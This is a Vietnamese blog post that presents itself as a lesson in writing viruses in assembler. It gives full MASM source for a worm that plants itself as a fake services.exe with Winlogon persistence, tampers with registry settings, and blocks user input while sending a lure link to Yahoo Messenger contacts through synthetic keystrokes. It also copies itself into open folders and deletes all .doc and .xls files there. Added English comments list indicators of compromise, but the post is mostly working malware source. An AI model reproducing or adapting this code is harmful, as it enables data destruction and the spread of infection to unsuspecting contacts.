Code Asm Virus Mai Phương Thuý 2006
Author: Toan Thang
Origin Link: http://toanthang.spaces.live.com/blog/cns!A4E5440D42A2F4F4!977.entry
Giới thiệu với các bạn phương thức viết virus bằng ngôn ngữ Assembler.
Chức năng của virus :
- khi lây nhiễm vào máy victim sẽ gởi link chứa Virus tới tất cả các nick trong list Yahoo Chat Messenger.
- Xoá tất cả các file *.doc và *.xls.
Code ASM :
.386
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\advapi32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\advapi32.lib
; ---------------------------------------------------------------------------
; Local re-declarations of the Win32 FILETIME and WIN32_FIND_DATA layouts.
; Only Search.cFileName is read by the code below; the remaining fields are
; filled by the Find* calls but never inspected here.
; NOTE(review): windows.inc is included above and presumably already declares
; these types under their SDK names - the copies here use different
; capitalisation, so they do not collide; confirm against the include file.
; ---------------------------------------------------------------------------
FileTime Struct
dwLowDateTime dd ?
dwHighDateTime dd ?
FileTime Ends
Win32_Find_Data Struct
dwFileAttributes dd ?
ftCreationTime FileTime <>
ftLastAccessTime FileTime <>
ftLastWriteTime FileTime <>
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved0 dd ?
dwReserved1 dd ?
cFileName db 260 dup(?)                 ; MAX_PATH name of the current match; the only field used
cAlternate db 260 dup(?)
Win32_Find_Data Ends
; ---------------------------------------------------------------------------
; Data section. Analyst notes: every literal below is an observable indicator
; of this sample - the registry keys/values it writes, the file names it
; drops, the window classes it searches for and the lure text it pastes.
; NOTE(review): a number of equates (sValueType1/2, SamDesired, CmdShow,
; sDwFlags1/2, sVK_Ctrl/Shift/Alt/Down/End, wFormat, wFlags) carry no value
; in this listing; as posted the file does not assemble.
; ---------------------------------------------------------------------------
.data
sVirusFileName db 180 dup(0)            ; full path of the running executable (GetModuleFileName)
sWinDir db 180 dup(0)                   ; %WINDIR%, later extended with sSourceVirus into the drop path
sSourceVirus db "\system32\drivers\services.exe",0 ; IoC: a "services.exe" under system32\drivers, not System32 itself
HKEY_LOCAL_MACHINE equ 80000002h
sSubKey1 db "Software\Microsoft\Windows NT\CurrentVersion\Winlogon",0 ; IoC: persistence via Winlogon\Shell (HKLM)
sValueName1 db "Shell",0
sValue1 db "Explorer.exe ",0            ; Shell becomes "Explorer.exe " + drop path (note trailing space)
sValueFull db 180 dup(0)                ; buffer in which that Shell value is assembled
sValueType1 equ
sValueType2 equ
SamDesired equ
RegHandle dd 0                          ; HKEY from RegOpenKeyEx, reused for every key
sYahooClass db "YahooBuddyMain",0       ; window class of the Yahoo Messenger main window (spreading trigger)
CmdShow equ
sRetval dd 0                            ; HWND of that window
sDwFlags1 equ
sDwFlags2 equ
sVK_Ctrl equ
sVK_Shift equ
sVK_Alt equ
sVK_Down equ
sVK_End equ
sVK_Enter equ 13
sVK_U equ 85                            ; letter keys: virtual-key code equals the uppercase ASCII value
sVK_N equ 78
sVK_M equ 77
sVK_V equ 86
sVirusMsg db "hinh chup len hoa hau Mai Phuong Thuy ... dang thay quan ao trong toilet ... ",13,10 ; lure text placed on the clipboard
db "khi con la hoc sinh ... http://my.http.vn/hinhvn/miss_thuy.jpg :D",0 ; IoC: the URL sent to contacts
wFormat equ
wFlags equ
hGlobalMemory dd 0                      ; HGLOBAL handed to SetClipboardData (never freed here)
lpGlobalMemory dd 0
HKEY_CURRENT_USER equ 80000001h
sSubKey2 db "Software\Microsoft\Internet Explorer\Main",0 ; IoC: IE "Window Title" rewritten
sValueName2 db "Window Title",0
sExplorerTitle db ".:: Yeu Giang Son Va Yeu My Nhan ::.",0
sSubKey3 db "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer",0 ; IoC: NoFolderOptions policy set to 1
sValueName3 db "NoFolderOptions",0
sGt dd 1                                ; DWORD 1, written to both NoFolderOptions and FullPath
sSubKey4 db "Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState",0 ; FullPath=1 so Explorer titles are full paths (payload depends on it)
sValueName4 db "FullPath",0
Search Win32_Find_Data <>               ; result record for FindFirstFile/FindNextFile
sExplClass db "CabinetWClass",0         ; window class of an open Explorer folder window
sFileLay db "\Thong Bao.exe",0          ; IoC: name of the copy dropped into the open folder
sExplTitle db 180 dup(0)                ; Explorer window title, used as a directory path
sFindHandle dd 0                        ; HWND of the Explorer window
sFileHandle dd 0                        ; HANDLE from FindFirstFile
sLuu1 db 180 dup(0)                     ; scratch: full path of the file currently being deleted
sLuu2 db 180 dup(0)                     ; scratch: folder + search pattern
sDocFile db "\*.doc",0                  ; targeted extensions
sXlsFile db "\*.xls",0
sThem db "\",0
; ---------------------------------------------------------------------------
; Main - entry point. Flat, single-threaded, stdcall Win32 calls only; never
; returns (see the unconditional jmp _While near the end).
; Behaviour as written, in order:
;   1. Copies the running executable to %WINDIR%\system32\drivers\services.exe.
;   2. Persistence: HKLM\...\Winlogon\Shell = "Explorer.exe <dropped path>".
;   3. HKCU tampering: IE window title; NoFolderOptions = 1 (hides Folder
;      Options); CabinetState\FullPath = 1 (Explorer titles show full paths -
;      step 5 depends on that).
;   4. Loop: if a Yahoo Messenger window (class YahooBuddyMain) exists, waits
;      60 s, blocks user input, replaces the clipboard with sVirusMsg and
;      drives the client with synthetic keystrokes, then waits 3 min.
;   5. Finds an open Explorer window (class CabinetWClass), treats its title
;      as a directory, copies itself there as "Thong Bao.exe", deletes every
;      *.doc and *.xls in that directory, sleeps 0.8 s and repeats from 4.
; Detection / response notes: Winlogon\Shell differing from "explorer.exe";
; services.exe under system32\drivers; the three HKCU values above; a
; non-shell process calling BlockInput/keybd_event; clipboard text equal to
; sVirusMsg; "Thong Bao.exe" appearing in user folders alongside missing
; Office files. Restore the Shell value as part of cleanup, not only the file.
; Registers: eax carries API return values only; all state lives in .data.
; ---------------------------------------------------------------------------
.code
Main:
;Get the full path of the running executable
push 180
push offset sVirusFileName
push 00h
call GetModuleFileName
;Copy it to %WINDIR%\system32\drivers\services.exe (sWinDir becomes the destination path)
push 180
push offset sWinDir
call GetWindowsDirectory
push offset sSourceVirus
push offset sWinDir
call lstrcat
push 1                                  ; bFailIfExists = TRUE: an already-dropped copy is left alone
push offset sWinDir
push offset sVirusFileName
call CopyFile
;Persistence: Winlogon\Shell = "Explorer.exe " + dropped path, applied at every logon
push offset sValue1
push offset sValueFull
call lstrcat
push offset sWinDir
push offset sValueFull
call lstrcat
push offset RegHandle
push SamDesired
push 00h
push offset sSubKey1
push HKEY_LOCAL_MACHINE
call RegOpenKeyEx
test eax,eax                            ; ERROR_SUCCESS is 0; any other result skips the write
jnz Exit1
push 180                                ; cbData = the whole 180-byte buffer, not the string length
push offset sValueFull
push sValueType1
push 00h
push offset sValueName1
push RegHandle
call RegSetValueEx
Exit1:
push RegHandle                          ; closed even when the open failed
call RegCloseKey
;Rewrite the Internet Explorer window title (HKCU)
push offset RegHandle
push SamDesired
push 00h
push offset sSubKey2
push HKEY_CURRENT_USER
call RegOpenKeyEx
test eax,eax
jnz Exit2
push 38
push offset sExplorerTitle
push sValueType1
push 00h
push offset sValueName2
push RegHandle
call RegSetValueEx
Exit2:
push RegHandle
call RegCloseKey
;Hide Explorer's Folder Options menu (Policies\Explorer\NoFolderOptions = 1)
push offset RegHandle
push SamDesired
push 00h
push offset sSubKey3
push HKEY_CURRENT_USER
call RegOpenKeyEx
test eax,eax
jnz Exit3
push 4d                                 ; cbData = sizeof(DWORD)
push offset sGt
push sValueType2
push 00h
push offset sValueName3
push RegHandle
call RegSetValueEx
Exit3:
push RegHandle
call RegCloseKey
;Make Explorer show the full path in its title (CabinetState\FullPath = 1); the payload below reads that title as a directory
push offset RegHandle
push SamDesired
push 00h
push offset sSubKey4
push HKEY_CURRENT_USER
call RegOpenKeyEx
test eax,eax
jnz Exit4
push 4d
push offset sGt
push sValueType2
push 00h
push offset sValueName4
push RegHandle
call RegSetValueEx
Exit4:
push RegHandle
call RegCloseKey
;Spreading trigger: look for the Yahoo Messenger main window
;(original comment: "spread via Yahoo chat"); if absent, skip to the file-system payload
_While:
push 00h
push offset sYahooClass
call FindWindow
mov sRetval,eax
cmp eax,0
jz Exit                                 ; no Messenger window -> Explorer/file payload below
push 60000                              ; 60 s delay before acting
call Sleep
push 1                                  ; BlockInput(TRUE): user keyboard/mouse locked out until the push 0 below
call BlockInput
push CmdShow
push sRetval
call ShowWindow
push sRetval
call SetForegroundWindow
;Put sVirusMsg on the clipboard (GlobalAlloc + lstrcpy + SetClipboardData); the user's previous clipboard content is lost
push offset sVirusMsg
call lstrlen
inc eax                                 ; +1 for the terminating NUL
push eax
push wFlags
call GlobalAlloc
mov hGlobalMemory,eax
push eax
call GlobalLock
mov lpGlobalMemory,eax
push offset sVirusMsg
push lpGlobalMemory
call lstrcpy
push hGlobalMemory
call GlobalUnlock
push 00h
call OpenClipboard
call EmptyClipboard
push hGlobalMemory
push wFormat
call SetClipboardData
call CloseClipboard
;Synthetic keystrokes into the foreground Messenger window via keybd_event
;(original comment: "get all the nick names"); each key is pressed, then released with sDwFlags1
push 00h
push 00h
push 00h
push sVK_Ctrl
call keybd_event
push 00h
push 00h
push 00h
push sVK_M
call keybd_event
push 00h
push sDwFlags1
push 00h
push sVK_M
call keybd_event
push 00h
push sDwFlags1
push 00h
push sVK_Ctrl
call keybd_event
push 00h
push 00h
push 00h
push sVK_Down
call keybd_event
push 00h
push sDwFlags1
push 00h
push sVK_Down
call keybd_event
push 00h
push 00h
push 00h
push sVK_Shift
call keybd_event
push 00h
push sDwFlags2
push 00h
push sVK_End
call keybd_event
push 00h
push sDwFlags1
push 00h
push sVK_End
call keybd_event
push 00h
push sDwFlags1
push 00h
push sVK_Shift
call keybd_event
push 00h
push 00h
push 00h
push sVK_Enter
call keybd_event
push 00h
push sDwFlags1
push 00h
push sVK_Enter
call keybd_event
push 00h
push 00h
push 00h
push sVK_Ctrl
call keybd_event
push 00h
push 00h
push 00h
push sVK_V
call keybd_event
push 00h
push sDwFlags1
push 00h
push sVK_V
call keybd_event
push 00h
push sDwFlags1
push 00h
push sVK_Ctrl
call keybd_event
push 00h
push 00h
push 00h
push sVK_Enter
call keybd_event
push 00h
push sDwFlags1
push 00h
push sVK_Enter
call keybd_event
;Second keystroke sequence (original comment: "put the link in the Yahoo Messenger status")
push 00h
push 00h
push 00h
push sVK_Alt
call keybd_event
push 00h
push 00h
push 00h
push sVK_M
call keybd_event
push 00h
push sDwFlags1
push 00h
push sVK_M
call keybd_event
push 00h
push sDwFlags1
push 00h
push sVK_Alt
call keybd_event
push 00h
push 00h
push 00h
push sVK_U
call keybd_event
push 00h
push sDwFlags1
push 00h
push sVK_U
call keybd_event
push 00h
push 00h
push 00h
push sVK_N
call keybd_event
push 00h
push sDwFlags1
push 00h
push sVK_N
call keybd_event
push 00h
push 00h
push 00h
push sVK_Ctrl
call keybd_event
push 00h
push 00h
push 00h
push sVK_V
call keybd_event
push 00h
push sDwFlags1
push 00h
push sVK_V
call keybd_event
push 00h
push sDwFlags1
push 00h
push sVK_Ctrl
call keybd_event
push 00h
push 00h
push 00h
push sVK_Enter
call keybd_event
push 00h
push sDwFlags1
push 00h
push sVK_Enter
call keybd_event
push 00h
push 00h
push 00h
push sVK_Enter
call keybd_event
push 00h
push sDwFlags1
push 00h
push sVK_Enter
call keybd_event
push 0                                  ; BlockInput(FALSE): input returned to the user
call BlockInput
push 180000                             ; 3 min before the next attempt
call Sleep
Exit:
;Copy the executable into whichever folder is open in Explorer (class CabinetWClass);
;with FullPath=1 set above, the window title is the directory path
push 00h
push offset sExplClass
call FindWindow
mov sFindHandle,eax                     ; may be 0 if no Explorer window exists; not checked
push 180
push offset sExplTitle
push sFindHandle
call GetWindowText
push offset sFileLay
push offset sExplTitle
call lstrcat                            ; sExplTitle = <folder> + "\Thong Bao.exe"
push 1
push offset sExplTitle
push offset sVirusFileName
call CopyFile
;Delete every *.doc in that folder
push 180
push offset sExplTitle
push sFindHandle
call GetWindowText                      ; re-read the title to drop the "\Thong Bao.exe" suffix appended above
push offset sExplTitle
push offset sLuu1
call lstrcpy                            ; sLuu1 = folder path, rebuilt for each match below
push offset sExplTitle
push offset sLuu2
call lstrcpy
push offset sDocFile
push offset sLuu2
call lstrcat                            ; sLuu2 = folder + "\*.doc"
push offset Search
push offset sLuu2
call FindFirstFile
mov dword ptr [sFileHandle],eax
FindNextDoc:
test eax,eax                            ; continue while the last Find* call returned non-zero
jz KetThucDoc
push offset sThem
push offset sLuu1
call lstrcat
push offset Search.cFileName
push offset sLuu1
call lstrcat                            ; sLuu1 = folder + "\" + matched name
push offset sLuu1
call DeleteFile
mov sLuu1,00h                           ; byte store at offset 0: truncates sLuu1 to "" before rebuilding it
push offset sExplTitle
push offset sLuu1
call lstrcat
push offset Search
push dword ptr [sFileHandle]
call FindNextFile
jmp FindNextDoc
KetThucDoc:
;Same loop for *.xls
push offset sExplTitle
push offset sLuu1
call lstrcpy
push offset sExplTitle
push offset sLuu2
call lstrcpy
push offset sXlsFile
push offset sLuu2
call lstrcat                            ; sLuu2 = folder + "\*.xls"
push offset Search
push offset sLuu2
call FindFirstFile
mov dword ptr [sFileHandle],eax
FindNextXls:
test eax,eax
jz KetThucXls
push offset sThem
push offset sLuu1
call lstrcat
push offset Search.cFileName
push offset sLuu1
call lstrcat
push offset sLuu1
call DeleteFile
mov sLuu1,00h                           ; truncate sLuu1 to "" (byte store), then rebuild from the folder path
push offset sExplTitle
push offset sLuu1
call lstrcat
push offset Search
push dword ptr [sFileHandle]
call FindNextFile
jmp FindNextXls
KetThucXls:
push 800                                ; 0.8 s, then loop forever: the process never exits on its own
call Sleep
jmp _While
push 00h                                ; unreachable - the jmp above is unconditional
call ExitProcess
End Main
Mọi ý kiến thắc mắc hãy comment cho tui.